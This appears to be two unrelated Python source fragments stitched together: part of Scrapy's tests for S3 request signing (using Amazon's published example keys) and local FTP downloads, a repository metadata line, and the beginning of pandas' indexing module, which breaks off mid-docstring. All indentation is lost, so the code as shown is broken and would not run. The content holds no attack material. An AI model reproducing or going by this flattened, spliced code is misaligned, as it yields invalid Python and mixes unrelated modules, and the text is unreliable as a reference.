"""Old deprecated reference to http10 downloader handler"""
download_handler_cls = HttpDownloadHandler
class Http10ProxyTestCase(HttpProxyTestCase):
download_handler_cls = HTTP10DownloadHandler
class Http11ProxyTestCase(HttpProxyTestCase):
download_handler_cls = HTTP11DownloadHandler
if 'http11' not in optional_features:
skip = 'HTTP1.1 not supported in twisted < 11.1.0'
class HttpDownloadHandlerMock(object):
def __init__(self, settings):
pass
def download_request(self, request, spider):
return request
class S3TestCase(unittest.TestCase):
skip = 'boto' not in optional_features and 'missing boto library'
# test use same example keys than amazon developer guide
# http://s3.amazonaws.com/awsdocs/S3/20060301/s3-dg-20060301.pdf
# and the tests described here are the examples from that manual
AWS_ACCESS_KEY_ID = '0PN5J17HBGZHT7JJ3X82'
AWS_SECRET_ACCESS_KEY = 'uV3F3YluFJax1cknvbcGwgjvx4QpvB+leU8dUj2o'
def setUp(self):
s3reqh = S3DownloadHandler(Settings(), self.AWS_ACCESS_KEY_ID, \
self.AWS_SECRET_ACCESS_KEY, \
httpdownloadhandler=HttpDownloadHandlerMock)
self.download_request = s3reqh.download_request
self.spider = Spider('foo')
def test_request_signing1(self):
# gets an object from the johnsmith bucket.
req = Request('s3://johnsmith/photos/puppy.jpg',
headers={'Date': 'Tue, 27 Mar 2007 19:36:42 +0000'})
httpreq = self.download_request(req, self.spider)
self.assertEqual(httpreq.headers['Authorization'], \
'AWS 0PN5J17HBGZHT7JJ3X82:xXjDGYUmKxnwqr5KXNPGldn5LbA=')
def test_request_signing2(self):
# puts an object into the johnsmith bucket.
req = Request('s3://johnsmith/photos/puppy.jpg', method='PUT', headers={
'Content-Type': 'image/jpeg',
'Date': 'Tue, 27 Mar 2007 21:15:45 +0000',
'Content-Length': '94328',
})
httpreq = self.download_request(req, self.spider)
self.assertEqual(httpreq.headers['Authorization'], \
'AWS 0PN5J17HBGZHT7JJ3X82:hcicpDDvL9SsO6AkvxqmIWkmOuQ=')
def test_request_signing3(self):
# lists the content of the johnsmith bucket.
req = Request('s3://johnsmith/?prefix=photos&max-keys=50&marker=puppy', \
method='GET', headers={
'User-Agent': 'Mozilla/5.0',
'Date': 'Tue, 27 Mar 2007 19:42:41 +0000',
})
httpreq = self.download_request(req, self.spider)
self.assertEqual(httpreq.headers['Authorization'], \
'AWS 0PN5J17HBGZHT7JJ3X82:jsRt/rhG+Vtp88HrYL706QhE4w4=')
def test_request_signing4(self):
# fetches the access control policy sub-resource for the 'johnsmith' bucket.
req = Request('s3://johnsmith/?acl', \
method='GET', headers={'Date': 'Tue, 27 Mar 2007 19:44:46 +0000'})
httpreq = self.download_request(req, self.spider)
self.assertEqual(httpreq.headers['Authorization'], \
'AWS 0PN5J17HBGZHT7JJ3X82:thdUi9VAkzhkniLj96JIrOPGi0g=')
def test_request_signing5(self):
# deletes an object from the 'johnsmith' bucket using the
# path-style and Date alternative.
req = Request('s3://johnsmith/photos/puppy.jpg', \
method='DELETE', headers={
'Date': 'Tue, 27 Mar 2007 21:20:27 +0000',
'x-amz-date': 'Tue, 27 Mar 2007 21:20:26 +0000',
})
httpreq = self.download_request(req, self.spider)
self.assertEqual(httpreq.headers['Authorization'], \
'AWS 0PN5J17HBGZHT7JJ3X82:k3nL7gH3+PadhTEVn5Ip83xlYzk=')
def test_request_signing6(self):
# uploads an object to a CNAME style virtual hosted bucket with metadata.
req = Request('s3://static.johnsmith.net:8080/db-backup.dat.gz', \
method='PUT', headers={
'User-Agent': 'curl/7.15.5',
'Host': 'static.johnsmith.net:8080',
'Date': 'Tue, 27 Mar 2007 21:06:08 +0000',
'x-amz-acl': 'public-read',
'content-type': 'application/x-download',
'Content-MD5': '4gJE4saaMU4BqNR0kLY+lw==',
'X-Amz-Meta-ReviewedBy': 'joe@johnsmith.net,jane@johnsmith.net',
'X-Amz-Meta-FileChecksum': '0x02661779',
'X-Amz-Meta-ChecksumAlgorithm': 'crc32',
'Content-Disposition': 'attachment; filename=database.dat',
'Content-Encoding': 'gzip',
'Content-Length': '5913339',
})
httpreq = self.download_request(req, self.spider)
self.assertEqual(httpreq.headers['Authorization'], \
'AWS 0PN5J17HBGZHT7JJ3X82:C0FlOtU8Ylb9KDTpZqYkZPX91iI=')
class FTPTestCase(unittest.TestCase):
username = "scrapy"
password = "passwd"
if twisted_version < (10, 2, 0):
skip = "Twisted pre 10.2.0 doesn't allow to set home path other than /home"
def setUp(self):
# setup dirs and test file
self.directory = self.mktemp()
os.mkdir(self.directory)
userdir = os.path.join(self.directory, self.username)
os.mkdir(userdir)
FilePath(userdir).child('file.txt').setContent("I have the power!")
# setup server
realm = FTPRealm(anonymousRoot=self.directory, userHome=self.directory)
p = portal.Portal(realm)
users_checker = checkers.InMemoryUsernamePasswordDatabaseDontUse()
users_checker.addUser(self.username, self.password)
p.registerChecker(users_checker, credentials.IUsernamePassword)
self.factory = FTPFactory(portal=p)
self.port = reactor.listenTCP(0, self.factory, interface="127.0.0.1")
self.portNum = self.port.getHost().port
self.download_handler = FTPDownloadHandler(Settings())
self.addCleanup(self.port.stopListening)
def _add_test_callbacks(self, deferred, callback=None, errback=None):
def _clean(data):
self.download_handler.client.transport.loseConnection()
return data
deferred.addCallback(_clean)
if callback:
deferred.addCallback(callback)
if errback:
deferred.addErrback(errback)
return deferred
def test_ftp_download_success(self):
request = Request(url="ftp://127.0.0.1:%s/file.txt" % self.portNum,
meta={"ftp_user": self.username, "ftp_password": self.password})
d = self.download_handler.download_request(request, None)
def _test(r):
self.assertEqual(r.status, 200)
self.assertEqual(r.body, 'I have the power!')
self.assertEqual(r.headers, {'Local Filename': [''], 'Size': ['17']})
return self._add_test_callbacks(d, _test)
def test_ftp_download_notexist(self):
request = Request(url="ftp://127.0.0.1:%s/notexist.txt" % self.portNum,
meta={"ftp_user": self.username, "ftp_password": self.password})
d = self.download_handler.download_request(request, None)
def _test(r):
self.assertEqual(r.status, 404)
return self._add_test_callbacks(d, _test)
def test_ftp_local_filename(self):
local_fname = "/tmp/file.txt"
request = Request(url="ftp://127.0.0.1:%s/file.txt" % self.portNum,
meta={"ftp_user": self.username, "ftp_password": self.password, "ftp_local_filename": local_fname})
d = self.download_handler.download_request(request, None)
def _test(r):
self.assertEqual(r.body, local_fname)
self.assertEqual(r.headers, {'Local Filename': ['/tmp/file.txt'], 'Size': ['17']})
self.assertTrue(os.path.exists(local_fname))
with open(local_fname) as f:
self.assertEqual(f.read(), "I have the power!")
os.remove(local_fname)
return self._add_test_callbacks(d, _test)
def test_invalid_credentials(self):
request = Request(url="ftp://127.0.0.1:%s/file.txt" % self.portNum,
meta={"ftp_user": self.username, "ftp_password": 'invalid'})
d = self.download_handler.download_request(request, None)
def _test(r):
self.assertEqual(r.type, ConnectionLost)
return self._add_test_callbacks(d, errback=_test)
| scrapinghub/scrapy | tests/test_downloader_handlers.py | Python | bsd-3-clause | 18,951 |
# pylint: disable=W0223
from pandas.core.index import Index, MultiIndex
from pandas.compat import range, zip
import pandas.compat as compat
import pandas.core.common as com
from pandas.core.common import (is_bool_indexer, is_integer_dtype,
_asarray_tuplesafe, is_list_like, isnull,
is_null_slice, is_full_slice,
ABCSeries, ABCDataFrame, ABCPanel, is_float,
_values_from_object, _infer_fill_value, is_integer)
import numpy as np
# the supported indexers
def get_indexers_list():
return [
('ix', _IXIndexer),
('iloc', _iLocIndexer),
('loc', _LocIndexer),
('at', _AtIndexer),
('iat', _iAtIndexer),
]
# "null slice"
_NS = slice(None, None)
# the public IndexSlicerMaker
class _IndexSlice(object):
def __getitem__(self, arg):
return arg
IndexSlice = _IndexSlice()
class IndexingError(Exception):
pass
class _NDFrameIndexer(object):
_valid_types = None
_exception = KeyError
def __init__(self, obj, name):
self.obj = obj
self.ndim = obj.ndim
self.name = name
self.axis = None
def __call__(self, *args, **kwargs):
# we need to return a copy of ourselves
self = self.__class__(self.obj, self.name)
# set the passed in values
for k, v in compat.iteritems(kwargs):
setattr(self,k,v)
return self
def __iter__(self):
raise NotImplementedError('ix is not iterable')
def __getitem__(self, key):
if type(key) is tuple:
try:
values = self.obj.get_value(*key)
if np.isscalar(values):
return values
except Exception:
pass
return self._getitem_tuple(key)
else:
return self._getitem_axis(key, axis=0)
def _get_label(self, label, axis=0):
if self.ndim == 1:
# for perf reasons we want to try _xs first
# as its basically direct indexing
# but will fail when the index is not present
# see GH5667
try:
return self.obj._xs(label, axis=axis)
except:
return self.obj[label]
elif (isinstance(label, tuple) and
isinstance(label[axis], slice)):
raise IndexingError('no slices here, handle elsewhere')
return self.obj._xs(label, axis=axis)
def _get_loc(self, key, axis=0):
return self.obj._ixs(key, axis=axis)
def _slice(self, obj, axis=0, kind=None):
return self.obj._slice(obj, axis=axis, kind=kind)
def _get_setitem_indexer(self, key):
if self.axis is not None:
return self._convert_tuple(key, is_setter=True)
axis = self.obj._get_axis(0)
if isinstance(axis, MultiIndex):
try:
return axis.get_loc(key)
except Exception:
pass
if isinstance(key, tuple) and not self.ndim < len(key):
return self._convert_tuple(key, is_setter=True)
if isinstance(key, range):
return self._convert_range(key, is_setter=True)
try:
return self._convert_to_indexer(key, is_setter=True)
except TypeError:
raise IndexingError(key)
def __setitem__(self, key, value):
indexer = self._get_setitem_indexer(key)
self._setitem_with_indexer(indexer, value)
def _has_valid_type(self, k, axis):
raise NotImplementedError()
def _has_valid_tuple(self, key):
""" check the key for valid keys across my indexer """
for i, k in enumerate(key):
if i >= self.obj.ndim:
raise IndexingError('Too many indexers')
if not self._has_valid_type(k, i):
raise ValueError("Location based indexing can only have [%s] "
"types" % self._valid_types)
def _should_validate_iterable(self, axis=0):
""" return a boolean whether this axes needs validation for a passed iterable """
ax = self.obj._get_axis(axis)
if isinstance(ax, MultiIndex):
return False
elif ax.is_floating():
return False
return True
def _is_nested_tuple_indexer(self, tup):
if any([ isinstance(ax, MultiIndex) for ax in self.obj.axes ]):
return any([ is_nested_tuple(tup,ax) for ax in self.obj.axes ])
return False
def _convert_tuple(self, key, is_setter=False):
keyidx = []
if self.axis is not None:
axis = self.obj._get_axis_number(self.axis)
for i in range(self.ndim):
if i == axis:
keyidx.append(self._convert_to_indexer(key, axis=axis, is_setter=is_setter))
else:
keyidx.append(slice(None))
else:
for i, k in enumerate(key):
idx = self._convert_to_indexer(k, axis=i, is_setter=is_setter)
keyidx.append(idx)
return tuple(keyidx)
def _convert_range(self, key, is_setter=False):
""" convert a range argument """
return list(key)
def _convert_scalar_indexer(self, key, axis):
# if we are accessing via lowered dim, use the last dim
ax = self.obj._get_axis(min(axis, self.ndim - 1))
# a scalar
return ax._convert_scalar_indexer(key, kind=self.name)
def _convert_slice_indexer(self, key, axis):
# if we are accessing via lowered dim, use the last dim
ax = self.obj._get_axis(min(axis, self.ndim - 1))
return ax._convert_slice_indexer(key, kind=self.name)
def _has_valid_setitem_indexer(self, indexer):
return True
def _has_valid_positional_setitem_indexer(self, indexer):
""" validate that an positional indexer cannot enlarge its target
will raise if needed, does not modify the indexer externally """
if isinstance(indexer, dict):
raise IndexError("{0} cannot enlarge its target object"
.format(self.name))
else:
if not isinstance(indexer, tuple):
indexer = self._tuplify(indexer)
for ax, i in zip(self.obj.axes, indexer):
if isinstance(i, slice):
# should check the stop slice?
pass
elif is_list_like_indexer(i):
# should check the elements?
pass
elif is_integer(i):
if i >= len(ax):
raise IndexError("{0} cannot enlarge its target object"
.format(self.name))
elif isinstance(i, dict):
raise IndexError("{0} cannot enlarge its target object"
.format(self.name))
return True
def _setitem_with_indexer(self, indexer, value):
self._has_valid_setitem_indexer(indexer)
# also has the side effect of consolidating in-place
from pandas import Panel, DataFrame, Series
info_axis = self.obj._info_axis_number
# maybe partial set
take_split_path = self.obj._is_mixed_type
# if there is only one block/type, still have to take split path
# unless the block is one-dimensional or it can hold the value
if not take_split_path and self.obj._data.blocks:
blk, = self.obj._data.blocks
if 1 < blk.ndim: # in case of dict, keys are indices
val = list(value.values()) if isinstance(value,dict) else value
take_split_path = not blk._can_hold_element(val)
if isinstance(indexer, tuple) and len(indexer) == len(self.obj.axes):
for i, ax in zip(indexer, self.obj.axes):
# if we have any multi-indexes that have non-trivial slices (not null slices)
# then we must take the split path, xref GH 10360
if isinstance(ax, MultiIndex) and not (is_integer(i) or is_null_slice(i)):
take_split_path = True
break
if isinstance(indexer, tuple):
nindexer = []
for i, idx in enumerate(indexer):
if isinstance(idx, dict):
# reindex the axis to the new value
# and set inplace
key, _ = convert_missing_indexer(idx)
# if this is the items axes, then take the main missing
# path first
# this correctly sets the dtype and avoids cache issues
# essentially this separates out the block that is needed
# to possibly be modified
if self.ndim > 1 and i == self.obj._info_axis_number:
# add the new item, and set the value
# must have all defined axes if we have a scalar
# or a list-like on the non-info axes if we have a
# list-like
len_non_info_axes = [
len(_ax) for _i, _ax in enumerate(self.obj.axes)
if _i != i
]
if any([not l for l in len_non_info_axes]):
if not is_list_like_indexer(value):
raise ValueError("cannot set a frame with no "
"defined index and a scalar")
self.obj[key] = value
return self.obj
# add a new item with the dtype setup
self.obj[key] = _infer_fill_value(value)
new_indexer = convert_from_missing_indexer_tuple(
indexer, self.obj.axes)
self._setitem_with_indexer(new_indexer, value)
return self.obj
# reindex the axis
# make sure to clear the cache because we are
# just replacing the block manager here
# so the object is the same
index = self.obj._get_axis(i)
labels = index.insert(len(index),key)
self.obj._data = self.obj.reindex_axis(labels, i)._data
self.obj._maybe_update_cacher(clear=True)
self.obj.is_copy=None
nindexer.append(labels.get_loc(key))
else:
nindexer.append(idx)
indexer = tuple(nindexer)
else:
indexer, missing = convert_missing_indexer(indexer)
if missing:
# reindex the axis to the new value
# and set inplace
if self.ndim == 1:
index = self.obj.index
new_index = index.insert(len(index),indexer)
# this preserves dtype of the value
new_values = Series([value])._values
if len(self.obj._values):
new_values = np.concatenate([self.obj._values,
new_values])
self.obj._data = self.obj._constructor(
new_values, index=new_index, name=self.obj.name)._data
self.obj._maybe_update_cacher(clear=True)
return self.obj
elif self.ndim == 2:
# no columns and scalar
if not len(self.obj.columns):
raise ValueError(
"cannot set a frame with no defined columns"
)
# append a Series
if isinstance(value, Series):
value = value.reindex(index=self.obj.columns,copy=True)
value.name = indexer
# a list-list
else:
# must have conforming columns
if is_list_like_indexer(value):
if len(value) != len(self.obj.columns):
raise ValueError(
"cannot set a row with mismatched columns"
)
value = Series(value,index=self.obj.columns,name=indexer)
self.obj._data = self.obj.append(value)._data
self.obj._maybe_update_cacher(clear=True)
return self.obj
# set using setitem (Panel and > dims)
elif self.ndim >= 3:
return self.obj.__setitem__(indexer, value)
# set
item_labels = self.obj._get_axis(info_axis)
# align and set the values
if take_split_path:
if not isinstance(indexer, tuple):
indexer = self._tuplify(indexer)
if isinstance(value, ABCSeries):
value = self._align_series(indexer, value)
info_idx = indexer[info_axis]
if is_integer(info_idx):
info_idx = [info_idx]
labels = item_labels[info_idx]
# if we have a partial multiindex, then need to adjust the plane
# indexer here
if (len(labels) == 1 and
isinstance(self.obj[labels[0]].axes[0], MultiIndex)):
item = labels[0]
obj = self.obj[item]
index = obj.index
idx = indexer[:info_axis][0]
plane_indexer = tuple([idx]) + indexer[info_axis + 1:]
lplane_indexer = length_of_indexer(plane_indexer[0], index)
# require that we are setting the right number of values that
# we are indexing
if is_list_like_indexer(value) and np.iterable(value) and lplane_indexer != len(value):
if len(obj[idx]) != len(value):
raise ValueError(
"cannot set using a multi-index selection indexer "
"with a different length than the value"
)
# make sure we have an ndarray
value = getattr(value,'values',value).ravel()
# we can directly set the series here
# as we select a slice indexer on the mi
idx = index._convert_slice_indexer(idx)
obj._consolidate_inplace()
obj = obj.copy()
obj._data = obj._data.setitem(indexer=tuple([idx]), value=value)
self.obj[item] = obj
return
# non-mi
else:
plane_indexer = indexer[:info_axis] + indexer[info_axis + 1:]
if info_axis > 0:
plane_axis = self.obj.axes[:info_axis][0]
lplane_indexer = length_of_indexer(plane_indexer[0],
plane_axis)
else:
lplane_indexer = 0
def setter(item, v):
s = self.obj[item]
pi = plane_indexer[0] if lplane_indexer == 1 else plane_indexer
# perform the equivalent of a setitem on the info axis
# as we have a null slice or a slice with full bounds
# which means essentially reassign to the columns of a multi-dim object
# GH6149 (null slice), GH10408 (full bounds)
if isinstance(pi, tuple) and all(is_null_slice(idx) or is_full_slice(idx, len(self.obj)) for idx in pi):
s = v
else:
# set the item, possibly having a dtype change
s._consolidate_inplace()
s = s.copy()
s._data = s._data.setitem(indexer=pi, value=v)
s._maybe_update_cacher(clear=True)
# reset the sliced object if unique
self.obj[item] = s
def can_do_equal_len():
""" return True if we have an equal len settable """
if not len(labels) == 1 or not np.iterable(value):
return False
l = len(value)
item = labels[0]
index = self.obj[item].index
# equal len list/ndarray
if len(index) == l:
return True
elif lplane_indexer == l:
return True
return False
# we need an iterable, with a ndim of at least 1
# eg. don't pass through np.array(0)
if is_list_like_indexer(value) and getattr(value,'ndim',1) > 0:
# we have an equal len Frame
if isinstance(value, ABCDataFrame) and value.ndim > 1:
sub_indexer = list(indexer)
multiindex_indexer = isinstance(labels, MultiIndex)
for item in labels:
if item in value:
sub_indexer[info_axis] = item
v = self._align_series(
tuple(sub_indexer), value[item], multiindex_indexer
)
else:
v = np.nan
setter(item, v)
# we have an equal len ndarray/convertible to our labels
elif np.array(value).ndim == 2:
# note that this coerces the dtype if we are mixed
# GH 7551
value = np.array(value,dtype=object)
if len(labels) != value.shape[1]:
raise ValueError('Must have equal len keys and value '
'when setting with an ndarray')
for i, item in enumerate(labels):
# setting with a list, recoerces
setter(item, value[:, i].tolist())
# we have an equal len list/ndarray
elif can_do_equal_len():
setter(labels[0], value)
# per label values
else:
if len(labels) != len(value):
raise ValueError('Must have equal len keys and value '
'when setting with an iterable')
for item, v in zip(labels, value):
setter(item, v)
else:
# scalar
for item in labels:
setter(item, value)
else:
if isinstance(indexer, tuple):
indexer = maybe_convert_ix(*indexer)
# if we are setting on the info axis ONLY
# set using those methods to avoid block-splitting
# logic here
if len(indexer) > info_axis and is_integer(indexer[info_axis]) and all(
is_null_slice(idx) for i, idx in enumerate(indexer) if i != info_axis):
self.obj[item_labels[indexer[info_axis]]] = value
return
if isinstance(value, (ABCSeries, dict)):
value = self._align_series(indexer, Series(value))
elif isinstance(value, ABCDataFrame):
value = self._align_frame(indexer, value)
if isinstance(value, ABCPanel):
value = self._align_panel(indexer, value)
# check for chained assignment
self.obj._check_is_chained_assignment_possible()
# actually do the set
self.obj._consolidate_inplace()
self.obj._data = self.obj._data.setitem(indexer=indexer, value=value)
self.obj._maybe_update_cacher(clear=True)
def _align_series(self, indexer, ser, multiindex_indexer=False):
"""
Parameters
----------
indexer : tuple, slice, scalar
The indexer used to get the locations that will be set to
`ser`
ser : pd.Series
The values to assign to the locations specified by `indexer`
multiindex_indexer : boolean, optional
Defaults to False. Should be set to True if `indexer` was from
a `pd.MultiIndex`, to avoid unnecessary broadcasting.
Returns:
--------
`np.array` of `ser` broadcast to the appropriate shape for assignment
to the locations selected by `indexer`
"""
if isinstance(indexer, (slice, np.ndarray, list, Index)):
indexer = tuple([indexer])
if isinstance(indexer, tuple):
# flatten np.ndarray indexers
ravel = lambda i: i.ravel() if isinstance(i, np.ndarray) else i
indexer = tuple(map(ravel, indexer))
aligners = [not is_null_slice(idx) for idx in indexer]
sum_aligners = sum(aligners)
single_aligner = sum_aligners == 1
is_frame = self.obj.ndim == 2
is_panel = self.obj.ndim >= 3
obj = self.obj
# are we a single alignable value on a non-primary
# dim (e.g. panel: 1,2, or frame: 0) ?
# hence need to align to a single axis dimension
# rather that find all valid dims
# frame
if is_frame:
single_aligner = single_aligner and aligners[0]
# panel
elif is_panel:
single_aligner = (single_aligner and
(aligners[1] or aligners[2]))
# we have a frame, with multiple indexers on both axes; and a
# series, so need to broadcast (see GH5206)
if (sum_aligners == self.ndim and
all([com.is_sequence(_) for _ in indexer])):
ser = ser.reindex(obj.axes[0][indexer[0]], copy=True)._values
# single indexer
if len(indexer) > 1 and not multiindex_indexer:
l = len(indexer[1])
ser = np.tile(ser, l).reshape(l, -1).T
return ser
for i, idx in enumerate(indexer):
ax = obj.axes[i]
# multiple aligners (or null slices)
if com.is_sequence(idx) or isinstance(idx, slice):
if single_aligner and is_null_slice(idx):
continue
new_ix = ax[idx]
if not is_list_like_indexer(new_ix):
new_ix = Index([new_ix])
else:
new_ix = Index(new_ix)
if ser.index.equals(new_ix) or not len(new_ix):
return ser._values.copy()
return ser.reindex(new_ix)._values
# 2 dims
elif single_aligner and is_frame:
# reindex along index
ax = self.obj.axes[1]
if ser.index.equals(ax) or not len(ax):
return ser._values.copy()
return ser.reindex(ax)._values
# >2 dims
elif single_aligner:
broadcast = []
for n, labels in enumerate(self.obj._get_plane_axes(i)):
# reindex along the matching dimensions
if len(labels & ser.index):
ser = ser.reindex(labels)
else:
broadcast.append((n, len(labels)))
# broadcast along other dims
ser = ser._values.copy()
for (axis, l) in broadcast:
shape = [-1] * (len(broadcast) + 1)
shape[axis] = l
ser = np.tile(ser, l).reshape(shape)
if self.obj.ndim == 3:
ser = ser.T
return ser
elif np.isscalar(indexer):
ax = self.obj._get_axis(1)
if ser.index.equals(ax):
return ser._values.copy()
return ser.reindex(ax)._values
raise ValueError('Incompatible indexer with Series')
def _align_frame(self, indexer, df):
is_frame = self.obj.ndim == 2
is_panel = self.obj.ndim >= 3
if isinstance(indexer, tuple):
aligners = [not is_null_slice(idx) for idx in indexer]
sum_aligners = sum(aligners)
single_aligner = sum_aligners == 1
idx, cols = None, None
sindexers = []
for i, ix in enumerate(indexer):
ax = self.obj.axes[i]
if com.is_sequence(ix) or isinstance(ix, slice):
if idx is None:
idx = ax[ix].ravel()
elif cols is None:
cols = ax[ix].ravel()
else:
break
else:
sindexers.append(i)
# panel
if is_panel:
# need to conform to the convention
# as we are not selecting on the items axis
# and we have a single indexer
# GH 7763
if len(sindexers) == 1 and sindexers[0] != 0:
df = df.T
if idx is None:
idx = df.index
if cols is None:
cols = df.columns
if idx is not None and cols is not None:
if df.index.equals(idx) and df.columns.equals(cols):
val = df.copy()._values
else:
val = df.reindex(idx, columns=cols)._values
return val
elif ((isinstance(indexer, slice) or is_list_like_indexer(indexer))
and is_frame):
ax = self.obj.index[indexer]
if df.index.equals(ax):
val = df.copy()._values
else:
# we have a multi-index and are trying to align
# with a particular, level GH3738
if isinstance(ax, MultiIndex) and isinstance(
df.index, MultiIndex) and ax.nlevels != df.index.nlevels:
raise TypeError("cannot align on a multi-index with out specifying the join levels")
val = df.reindex(index=ax)._values
return val
elif np.isscalar(indexer) and is_panel:
idx = self.obj.axes[1]
cols = self.obj.axes[2]
# by definition we are indexing on the 0th axis
# a passed in dataframe which is actually a transpose
# of what is needed
if idx.equals(df.index) and cols.equals(df.columns):
return df.copy()._values
return df.reindex(idx, columns=cols)._values
raise ValueError('Incompatible indexer with DataFrame')
def _align_panel(self, indexer, df):
is_frame = self.obj.ndim == 2
is_panel = self.obj.ndim >= 3
raise NotImplementedError("cannot set using an indexer with a Panel "
"yet!")
def _getitem_tuple(self, tup):
try:
return self._getitem_lowerdim(tup)
except IndexingError:
pass
# no multi-index, so validate all of the indexers
self._has_valid_tuple(tup)
# ugly hack for GH #836
if self._multi_take_opportunity(tup):
return self._multi_take(tup)
# no shortcut needed
retval = self.obj
for i, key in enumerate(tup):
if i >= self.obj.ndim:
raise IndexingError('Too many indexers')
if is_null_slice(key):
continue
retval = getattr(retval, self.name)._getitem_axis(key, axis=i)
return retval
def _multi_take_opportunity(self, tup):
from pandas.core.generic import NDFrame
# ugly hack for GH #836
if not isinstance(self.obj, NDFrame):
return False
if not all(is_list_like_indexer(x) for x in tup):
return False
# just too complicated
for indexer, ax in zip(tup, self.obj._data.axes):
if isinstance(ax, MultiIndex):
return False
elif is_bool_indexer(indexer):
return False
elif not ax.is_unique:
return False
return True
def _multi_take(self, tup):
""" create the reindex map for our objects, raise the _exception if we
can't create the indexer
"""
try:
o = self.obj
d = dict([
(a, self._convert_for_reindex(t, axis=o._get_axis_number(a)))
for t, a in zip(tup, o._AXIS_ORDERS)
])
return o.reindex(**d)
except:
raise self._exception
def _convert_for_reindex(self, key, axis=0):
labels = self.obj._get_axis(axis)
if is_bool_indexer(key):
key = check_bool_indexer(labels, key)
return labels[key]
else:
if isinstance(key, Index):
# want Index objects to pass through untouched
keyarr = key
else:
# asarray can be unsafe, NumPy strings are weird
keyarr = _asarray_tuplesafe(key)
if is_integer_dtype(keyarr) and not labels.is_integer():
keyarr = com._ensure_platform_int(keyarr)
return labels.take(keyarr)
return keyarr
def _handle_lowerdim_multi_index_axis0(self, tup):
# we have an axis0 multi-index, handle or raise
try:
# fast path for series or for tup devoid of slices
return self._get_label(tup, axis=0)
except TypeError:
# slices are unhashable
pass
except Exception as e1:
if isinstance(tup[0], (slice, Index)):
raise IndexingError("Handle elsewhere")
# raise the error if we are not sorted
ax0 = self.obj._get_axis(0)
if not ax0.is_lexsorted_for_tuple(tup):
raise e1
return None
def _getitem_lowerdim(self, tup):
# we can directly get the axis result since the axis is specified
if self.axis is not None:
axis = self.obj._get_axis_number(self.axis)
return self._getitem_axis(tup, axis=axis)
# we may have a nested tuples indexer here
if self._is_nested_tuple_indexer(tup):
return self._getitem_nested_tuple(tup)
# we maybe be using a tuple to represent multiple dimensions here
ax0 = self.obj._get_axis(0)
if isinstance(ax0, MultiIndex):
result = self._handle_lowerdim_multi_index_axis0(tup)
if result is not None:
return result
if len(tup) > self.obj.ndim:
raise IndexingError("Too many indexers. handle elsewhere")
# to avoid wasted computation
# df.ix[d1:d2, 0] -> columns first (True)
# df.ix[0, ['C', 'B', A']] -> rows first (False)
for i, key in enumerate(tup):
if is_label_like(key) or isinstance(key, tuple):
section = self._getitem_axis(key, axis=i)
# we have yielded a scalar ?
if not is_list_like_indexer(section):
return section
elif section.ndim == self.ndim:
# we're in the middle of slicing through a MultiIndex
# revise the key wrt to `section` by inserting an _NS
new_key = tup[:i] + (_NS,) + tup[i + 1:]
else:
new_key = tup[:i] + tup[i + 1:]
# unfortunately need an odious kludge here because of
# DataFrame transposing convention
if (isinstance(section, ABCDataFrame) and i > 0
and len(new_key) == 2):
a, b = new_key
new_key = b, a
if len(new_key) == 1:
new_key, = new_key
# This is an elided recursive call to iloc/loc/etc'
return getattr(section, self.name)[new_key]
raise IndexingError('not applicable')
def _getitem_nested_tuple(self, tup):
# we have a nested tuple so have at least 1 multi-index level
# we should be able to match up the dimensionaility here
# we have too many indexers for our dim, but have at least 1
# multi-index dimension, try to see if we have something like
# a tuple passed to a series with a multi-index
if len(tup) > self.ndim:
result = self._handle_lowerdim_multi_index_axis0(tup)
if result is not None:
return result
# this is a series with a multi-index specified a tuple of selectors
return self._getitem_axis(tup, axis=0)
# handle the multi-axis by taking sections and reducing
# this is iterative
obj = self.obj
axis = 0
for i, key in enumerate(tup):
if is_null_slice(key):
axis += 1
continue
current_ndim = obj.ndim
obj = getattr(obj, self.name)._getitem_axis(key, axis=axis)
axis += 1
# if we have a scalar, we are done
if np.isscalar(obj) or not hasattr(obj,'ndim'):
break
# has the dim of the obj changed?
# GH 7199
if obj.ndim < current_ndim:
# GH 7516
# if had a 3 dim and are going to a 2d
# axes are reversed on a DataFrame
if i >= 1 and current_ndim == 3 and obj.ndim == 2:
obj = obj.T
axis -= 1
return obj
def _getitem_axis(self, key, axis=0):
if self._should_validate_iterable(axis):
self._has_valid_type(key, axis)
labels = self.obj._get_axis(axis)
if isinstance(key, slice):
return self._get_slice_axis(key, axis=axis)
elif is_list_like_indexer(key) and not (isinstance(key, tuple) and
isinstance(labels, MultiIndex)):
if hasattr(key, 'ndim') and key.ndim > 1:
raise ValueError('Cannot index with multidimensional key')
return self._getitem_iterable(key, axis=axis)
else:
if is_integer(key):
if axis == 0 and isinstance(labels, MultiIndex):
try:
return self._get_label(key, axis=axis)
except (KeyError, TypeError):
if self.obj.index.levels[0].is_integer():
raise
# this is the fallback! (for a non-float, non-integer index)
if not labels.is_floating() and not labels.is_integer():
return self._get_loc(key, axis=axis)
return self._get_label(key, axis=axis)
def _getitem_iterable(self, key, axis=0):
if self._should_validate_iterable(axis):
self._has_valid_type(key, axis)
labels = self.obj._get_axis(axis)
if is_bool_indexer(key):
key = check_bool_indexer(labels, key)
inds, = key.nonzero()
return self.obj.take(inds, axis=axis, convert=False)
else:
if isinstance(key, Index):
# want Index objects to pass through untouched
keyarr = key
else:
# asarray can be unsafe, NumPy strings are weird
keyarr = _asarray_tuplesafe(key)
# have the index handle the indexer and possibly return
# an indexer or raising
indexer = labels._convert_list_indexer(keyarr, kind=self.name)
if indexer is not None:
return self.obj.take(indexer, axis=axis)
# this is not the most robust, but...
if (isinstance(labels, MultiIndex) and len(keyarr) and
not isinstance(keyarr[0], tuple)):
level = 0
else:
level = None
# existing labels are unique and indexer are unique
if labels.is_unique and Index(keyarr).is_unique:
try:
result = self.obj.reindex_axis(keyarr, axis=axis, level=level)
# this is an error as we are trying to find
# keys in a multi-index that don't exist
if isinstance(labels, MultiIndex) and level is not None:
if hasattr(result,'ndim') and not np.prod(result.shape) and len(keyarr):
raise KeyError("cannot index a multi-index axis with these keys")
return result
except AttributeError:
# Series
if axis != 0:
raise AssertionError('axis must be 0')
return self.obj.reindex(keyarr, level=level)
# existing labels are non-unique
else:
# reindex with the specified axis
if axis + 1 > self.obj.ndim:
raise AssertionError("invalid indexing error with "
"non-unique index")
new_target, indexer, new_indexer = labels._reindex_non_unique(keyarr)
if new_indexer is not None:
result = self.obj.take(indexer[indexer!=-1], axis=axis,
convert=False)
result = result._reindex_with_indexers({
axis: [new_target, new_indexer]
}, copy=True, allow_dups=True)
else:
result = self.obj.take(indexer, axis=axis,
convert=False)
return result
def _convert_to_indexer(self, obj, axis=0, is_setter=False):
"""
Convert indexing key into something we can use to do actual fancy
